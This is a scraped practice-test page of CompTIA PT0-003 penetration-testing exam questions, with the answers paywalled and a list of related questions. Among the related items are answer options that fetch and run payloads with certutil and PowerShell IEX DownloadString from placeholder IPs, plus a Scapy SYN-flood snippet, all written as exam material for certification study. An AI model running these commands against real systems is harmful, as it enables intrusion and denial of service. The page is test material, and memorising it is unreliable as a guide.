ExamGecko
Login
Home / CompTIA / PT0-003 / List of questions
Ask Question

CompTIA PT0-003 Practice Test - Questions Answers, Page 20

List of questions

Question 191

Report Export Collapse

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Become a Premium Member for full access
  Unlock Premium Member

Question 192

Report Export Collapse

A company wants to perform a BAS (Breach and Attack Simulation) to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?

Become a Premium Member for full access
  Unlock Premium Member

Question 193

Report Export Collapse

A penetration tester has been asked to conduct a blind web application test against a customer's corporate website. Which of the following tools would be best suited to perform this assessment?

Become a Premium Member for full access
  Unlock Premium Member

Question 194

Report Export Collapse

During an engagement, a penetration tester runs the following command against the host system:

host -t axfr domain.com dnsl.domain.com

Which of the following techniques best describes what the tester is doing?

Become a Premium Member for full access
  Unlock Premium Member

Question 195

Report Export Collapse

During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?

Become a Premium Member for full access
  Unlock Premium Member

Question 196

Report Export Collapse

A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

Become a Premium Member for full access
  Unlock Premium Member

Question 197

Report Export Collapse

A penetration tester finds it is possible to downgrade a web application's HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

<a target='_blank' href='https://internalapp/'>curl -s -i https://internalapp/</a>

HTTP/2 302

date: Thu, 11 Jan 2024 15:56:24 GMT

content-type: text/html; charset=iso-8659-1

location: /login

x-content-type-options: nosniff

server: Prod

Which of the following recommendations should the penetration tester include in the report?

Become a Premium Member for full access
  Unlock Premium Member

Question 198

Report Export Collapse

Which of the following are valid reasons for including base, temporal, and environmental CVSS metrics in the findings section of a penetration testing report? (Select two).

Become a Premium Member for full access
  Unlock Premium Member

Question 199

Report Export Collapse

A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?

Become a Premium Member for full access
  Unlock Premium Member

Question 200

Report Export Collapse

A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

Become a Premium Member for full access
  Unlock Premium Member
Total 214 questions
Go to page: of 22
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use? https://192.168.0.1/foo.exe A. powershell.exe impo C:\tools\foo.ps1 B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe C. powershell.exe -noni -encode IEX.Downloadstring(' http://172.16.0.1/ ') D. rundll32.exe c:\path\foo.dll,functName&lt;/a&gt;
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: ip = IP('192.168.50.2') tcp = TCP(sport=RandShort(), dport=80, flags='S') raw = RAW(b'X'*1024) p = ip/tcp/raw send(p, loop=1, verbose=0) Which of the following attack types is most likely being used in the test?
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?